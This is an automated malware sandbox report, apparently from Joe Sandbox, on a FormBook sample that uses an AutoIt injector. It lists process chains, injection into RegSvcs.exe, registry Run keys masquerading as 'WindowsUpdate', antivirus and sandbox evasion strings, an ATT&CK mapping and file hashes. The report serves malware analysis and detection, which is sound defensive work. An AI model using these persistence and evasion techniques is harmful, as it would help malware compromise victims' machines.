                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c tguujh.msc nhhjmppg.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc tguujh.msc nhhjmppg.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CB13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_00CB13F2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CB1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00CB1EF3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073AA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp, tguujh.msc, 0000000A.00000003.1474059537.0000000001411000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: tguujh.msc, tguujh.msc.exeBinary or memory string: Shell_TrayWnd
                Source: tguujh.msc, 0000000A.00000003.1594936092.0000000001323000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1466505141.0000000001325000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1595121984.0000000001323000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: tguujh.msc.exe, 00000010.00000002.1734842399.0000000001670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "
                Source: nhhjmppg.dll.0.dr, nhhjmppg.dll.10.drBinary or memory string: If WinGetText("Program Manager") = "0" Then
                Source: tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593096189.000000000136B000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593197392.0000000001372000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager{
                Source: tguujh.msc.exe, 00000010.00000003.1732066040.00000000016EA000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731627362.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1731814369.00000000016E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager\

                Language, Device and Operating System Detection

                barindex
                Yara detected Autoit Injector
                Source: Yara matchFile source: Process Memory Space: tguujh.msc PID: 2056, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: tguujh.msc.exe PID: 5748, type: MEMORYSTR
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B6694 cpuid 0_2_009B6694
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_009AFD34
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009B454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_009B454A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CAE5F8 GetUserNameW,10_2_00CAE5F8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00C8BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_00C8BCF2
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009A03BE GetVersionExW,0_2_009A03BE
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: tguujh.msc.exe, 00000010.00000003.1732225603.0000000001774000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000002.1735469081.0000000001775000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                Source: tguujh.msc, 0000000A.00000003.1593036066.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593247910.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1596235006.00000000013F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                Source: tguujh.msc, 0000000A.00000003.1593036066.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1592648815.0000000001369000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1596215795.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593353575.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1593424364.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: tguujh.msc.exeBinary or memory string: WIN_81
                Source: tguujh.msc.exeBinary or memory string: WIN_XP
                Source: tguujh.msc.exe.exe.16.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: tguujh.msc.exeBinary or memory string: WIN_XPe
                Source: tguujh.msc.exeBinary or memory string: WIN_VISTA
                Source: tguujh.msc.exeBinary or memory string: WIN_7
                Source: tguujh.msc.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CD2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00CD2163
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CD1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_00CD1B61
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C42163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00C42163
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C41B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,16_2_00C41B61

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		2
                Valid Accounts                		1
                Native API                		1
                Scripting                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		21
                Input Capture                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory1
                Account Discovery                		Remote Desktop Protocol21
                Input Capture                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts                		2
                Valid Accounts                		2
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		SteganographyAutomated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron11
                Registry Run Keys / Startup Folder                		21
                Access Token Manipulation                		1
                Software Packing                		NTDS27
                System Information Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
                Process Injection                		1
                DLL Side-Loading                		LSA Secrets261
                Security Software Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                Registry Run Keys / Startup Folder                		1
                Masquerading                		Cached Domain Credentials11
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Virtualization/Sandbox Evasion                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
                Process Injection                		Network Sniffing1
                System Network Configuration Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1569428 Sample: uhbrQkYNzx.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 67 Multi AV Scanner detection for submitted file 2->67 69 Yara detected Autoit Injector 2->69 71 Yara detected FormBook 2->71 73 8 other signatures 2->73 9 uhbrQkYNzx.exe 3 30 2->9         started        13 tguujh.msc.exe 1 1 2->13         started        process3 file4 49 C:\Users\user\AppData\Local\...\tguujh.msc, PE32 9->49 dropped 77 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->77 15 wscript.exe 1 9->15         started        51 C:\Users\user\AppData\...\tguujh.msc.exe.exe, PE32 13->51 dropped 79 Creates autostart registry keys with suspicious values (likely registry only malware) 13->79 81 Found API chain indicative of sandbox detection 13->81 83 Writes to foreign memory regions 13->83 18 RegSvcs.exe 13->18         started        20 RegSvcs.exe 13->20         started        signatures5 process6 signatures7 85 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->85 22 cmd.exe 1 15->22         started        24 cmd.exe 1 15->24         started        27 cmd.exe 1 15->27         started        29 WerFault.exe 4 18->29         started        process8 signatures9 31 tguujh.msc 1 27 22->31         started        35 conhost.exe 22->35         started        75 Uses ipconfig to lookup or modify the Windows network settings 24->75 37 conhost.exe 24->37         started        39 ipconfig.exe 1 24->39         started        41 conhost.exe 27->41         started        43 ipconfig.exe 1 27->43         started        process10 file11 53 C:\Users\user\AppData\...\tguujh.msc.exe, PE32 31->53 dropped 55 C:\Users\user\AppData\Local\...\tguujh.msc, PE32 31->55 dropped 57 C:\Users\user\AppData\...\tguujh.msc.exe, PE32 31->57 dropped 59 Found API chain indicative of sandbox detection 31->59 61 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 31->61 63 Writes to foreign memory regions 31->63 65 2 other signatures 31->65 45 RegSvcs.exe 31->45         started        47 RegSvcs.exe 31->47         started        signatures12 process13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                uhbrQkYNzx.exe68%ReversingLabsWin32.Trojan.Runner

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe.exe0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/JuhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp, tguujh.msc.exe, 00000010.00000002.1734578720.0000000000C95000.00000002.00000001.01000000.0000000D.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drfalse
                  		high
                  https://www.autoitscript.com/autoit3/uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc, 0000000A.00000003.1474059537.000000000141F000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.exe, 00000010.00000003.1655745740.0000000001797000.00000004.00000020.00020000.00000000.sdmp, tguujh.msc.0.dr, tguujh.msc.exe0.10.dr, tguujh.msc.exe.10.dr, tguujh.msc.10.dr, tguujh.msc.exe.exe.16.drfalse
                    		high

                    World Map of Contacted IPs

                    No contacted IP infos

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1569428
                    Start date and time:2024-12-05 19:00:52 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 44s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:26
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:uhbrQkYNzx.exe
                    renamed because original name is a hash value
                    Original Sample Name:f9b5af130a858971c48de2b78ac57dc335d2e5fa905887ab0e058c083cfc5fe3.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@28/48@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 180
                    • Number of non-executed functions: 227
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • VT rate limit hit for: uhbrQkYNzx.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    14:20:49API Interceptor1x Sleep call for process: uhbrQkYNzx.exe modified
                    14:21:41API Interceptor3x Sleep call for process: RegSvcs.exe modified
                    20:20:55AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll
                    20:21:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll
                    20:21:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc.exeqPLzfnxGbj.exeGet hashmaliciousFormBookBrowse
                      ngPebbPhbp.exeGet hashmaliciousRHADAMANTHYSBrowse
                        FS04dlvJrq.exeGet hashmaliciousFormBookBrowse
                          M1Y6kc9FpE.exeGet hashmaliciousFormBookBrowse
                            mJIvCBk5vF.exeGet hashmaliciousFormBookBrowse
                              lcbF0sywlU.exeGet hashmaliciousFormBookBrowse
                                1aG5DoOsAW.exeGet hashmaliciousFormBookBrowse
                                  Factura-2410-CFDI.batGet hashmaliciousUnknownBrowse
                                    DGFmCcZnM0.exeGet hashmaliciousFormBookBrowse
                                      qZkywW6Q0b.exeGet hashmaliciousFormBookBrowse
                                        C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscqPLzfnxGbj.exeGet hashmaliciousFormBookBrowse
                                          ngPebbPhbp.exeGet hashmaliciousRHADAMANTHYSBrowse
                                            FS04dlvJrq.exeGet hashmaliciousFormBookBrowse
                                              M1Y6kc9FpE.exeGet hashmaliciousFormBookBrowse
                                                mJIvCBk5vF.exeGet hashmaliciousFormBookBrowse
                                                  lcbF0sywlU.exeGet hashmaliciousFormBookBrowse
                                                    1aG5DoOsAW.exeGet hashmaliciousFormBookBrowse
                                                      Factura-2410-CFDI.batGet hashmaliciousUnknownBrowse
                                                        DGFmCcZnM0.exeGet hashmaliciousFormBookBrowse
                                                          qZkywW6Q0b.exeGet hashmaliciousFormBookBrowse

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\bhhd.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):558
                                                            Entropy (8bit):5.4249857641377375
                                                            Encrypted:false
                                                            SSDEEP:12:zQkwgVKGFrBPVRHcgfNBuJMaBPw+2xP7J:skwRGFrV8gVDaq+2xjJ
                                                            MD5:5E972946E66C873892B9DBC7627F43DA
                                                            SHA1:531AA209BEC0E92CAA45C1716009F92FDEC216E8
                                                            SHA-256:4E6AB4AF4097CDCBA0A9668830ADAB6D2F0E887F3E4A6D6C5D1E4208B8F1CD24
                                                            SHA-512:BA9B207D3CA6EEA7CF5DD80D1789FB50B26525AD7825768BD0C8E02A1F1FE9E0FBFB76BBAEE3F03C90C4CC96D66321AFE80DC0C24CA3ABC21D5A26C42BE1C9B9
                                                            Malicious:false
                                                            Preview:T49UAt23lz8879J2c1j9lx..UpDownConstants ComboConstants..5991J97j84I6HHd89JQ8AM9596MK9Ksf6Lo6d3s2068f9..ToolTipConstants ComboConstants..48EK7K17goP5ho12J52kdM13977Zq5N57SVMZ094PZTy33w704kvon81jqflw8g54uK5j2tKRHwGbg1QV57..StructureConstants TreeViewConstants..5at4alj54x5p..ComboConstants StructureConstants..51hM4FU2EU04230Q7lUc92pQw09QY80f4P9mN8929I2YSV8613a5ugetqgE356T57j1601e0232cfi5..DateTimeConstants FileConstants..200l42S40..ToolbarConstants TreeViewConstants..EVYU7941n878P31s7U1148D7E0923tv57Lzn1qCJtu77Fk3h97jW2Dqyo..ColorConstants FontConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\dwbs.ppt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):567
                                                            Entropy (8bit):5.56094256591372
                                                            Encrypted:false
                                                            SSDEEP:12:kXLFRBnBAu8DuiBNJHF1VlgtfTeQGsRrKKHglCvwbiPyi:UBnBcDdBNJHFqUKRGaKTbi3
                                                            MD5:08CFF3453C8ECDCAFACB5F99FF833910
                                                            SHA1:BDE46DD6D3F60241171346300AEAD24D1FBB60A8
                                                            SHA-256:8D52C2CDA979BA14CD244D5FAB615F283821B6F86C34B998D82166F0FD41521D
                                                            SHA-512:6076BE5D7B848D13CAE7B39D82D59AA137971F2438B82B85B67C119C57BA100C469B5A54B7BE4C19803BCEDC236C6D79A163A2E78BEFF78AB3C0911D8886A4E5
                                                            Malicious:false
                                                            Preview:dj40yWTkLz8gD0aE32t54cm7nbXv08WG689I6654LM24834zH42fAJzryjZr468ejo08823P9c0v8L4373072M4Pi4rM8P44L0q4h56L494M78tIn6K396ss7d1wfd719FEaQ53t2i1G6l823M9X46k058L53P5..StructureConstants UpDownConstants..N0jR3vG6Qy03m57549wztX29v8cF08H9590N42Nn4xRXxqNQh6S9169gr1364n6Bk036958IJz4lt05qW3dij1Q7KCM6JU2yK33f3Yi707H458uJc45TMFFYI66R3T20gAnT..FontConstants ComboConstants..4NJM2Qy7s5lt3Wo6025V39q7qaX51h63i0g3O3wy154c764Y9i81Vw36D69536V9EQ5gb0E1J0UHot36Dqxz0w200N8hWe03818rV5607v846w2bO9uZ02VeS24QdsEXn875t7MHO0315282XE147CvKR37090215390qcM0E2Blz..ComboConstants ComboConstants..

                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\gicjkqugui.docx

                                                            Download File
                                                            Process:C:\Users\user\Desktop\uhbrQkYNzx.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):36673
                                                            Entropy (8bit):5.594573464180928
                                                            Encrypted:false
                                                            SSDEEP:768:4x6JUE3SMIoX7l10mWIkTeb7TBZb7bFZ9lcjWTMKvzkwVLMXmBGRV0h4S:4xOSzoX7BxkTI7TBxxlCWT2ALM2opS
                                                            MD5:DC4380A1A59A937CE03D955B430E9948
                                                            SHA1:AF1B043D785071D380B4129D6C18836AF858F216
                                                            SHA-256:89B5DC18DE51C0DE35B888B9FE2E8D6995917F7AFF56C6ACF1BB3185CB63BE9E
                                                            SHA-512:39A40D4A51F0C930DE35B664BEF1FC438D76F2EA1CBBF19E5A1FC718EE0B80CE9098377B9FEF8FF8ABC254B54C0711F79142B230DC18E9116BDFD995623B4AD5
                                                            Malicious:false
